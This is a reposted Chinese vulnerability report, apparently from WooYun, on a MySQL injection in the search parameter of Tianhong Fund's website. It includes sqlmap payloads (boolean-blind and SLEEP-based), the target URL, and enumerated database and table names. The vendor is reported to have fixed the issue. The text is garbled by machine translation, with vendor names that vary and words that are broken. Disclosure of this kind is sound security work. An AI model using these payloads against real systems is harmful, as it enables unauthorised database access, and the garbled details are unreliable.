漏洞标题 天弘基金主站存在MySql注入 相关厂商 天弘基金管理有限公司 漏洞作者 丶n 提交时间 2016-06-20 09:04 公开时间 2016-06-21 10:23 漏洞类型 SQL注射漏…
漏洞标题
天鸿基金总站有一个MySql注入
相关制造商
天鸿基金管理有限公司
漏洞作者
丶ñ
提交时间
2016-06-20 09: 04
公共时间
2016-06-21 10: 23
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已修复
标签标签
漏洞详细信息
http://www.thfund.com.cn/
天虹基金总站
http://www.thfund.com.cn//thfund/fundlist/search/api/?word=e
Word参数存在注入
GET参数'word'易受攻击。你想继续测试其他人(如果是
纽约州)? [y/N] y
Sqlmap标识以下注入点,总共277个HTTP(s)r
请求:
---
参数:字(GET)
输入:基于布尔值的盲
标题: AND基于布尔的盲 - WHERE或H * ING子句
有效载荷:字=e%'和4468=4468 AND'%'='
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SLEEP)
有效载荷:字=e%'和(SELECT * FROM(SELECT(SLEEP(5)))scvx)AND'%'='
---
[08: 07: 03] [INFO]后端DBMS是MySQL
Web应用程序技术: PHP 5.6.20
后端DBMS: MySQL 5.0.12
当前用户:'[电子邮件 受保护]/* \ x1f \ x08'
漏洞证明:
可用数据库[4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] thweb
[08: 18: 46] [INFO]后端DBMS是MySQL
Web应用程序技术: PHP 5.6.20
后端DBMS: MySQL 5.0.12
[08: 18: 46] [INFO]获取数据库:'thweb'的表
[08: 18: 46] [INFO]获取数据库'thweb'的表数
[08: 18: 46] [警告]以单线程模式运行。请考虑使用o
Ption'--threads'用于更快的数据检索
[08: 18: 46] [INFO]检索到: 284
[08: 18: 54] [INFO]检索到: a_content_body
[08: 20: 04] [INFO]检索到: a_content_category
[08: 20: 54] [INFO]检索到: a_w_content
[08: 21: 46] [INFO]检索到: a_w_content_1
[08: 22: 07] [INFO]检索到: aa_channel_category
[08: 23: 29] [INFO]检索到: aa_fundday
[08: 24: 13] [INFO]检索到: accesslog
[08: 25: 00] [INFO]检索到:动作
[08: 25: 27] [INFO]检索到: aliyunoss_file
[08: 26: 35] [INFO]检索到: authmap
[08: 27: 07] [INFO]检索到:批次
[08: 27: 36] [INFO]检索到: b
如果表太多,它们将无法运行。
修理计划:
参数过滤
版权声明:请注明出处转n @乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 535 )
- 分类:黑客技术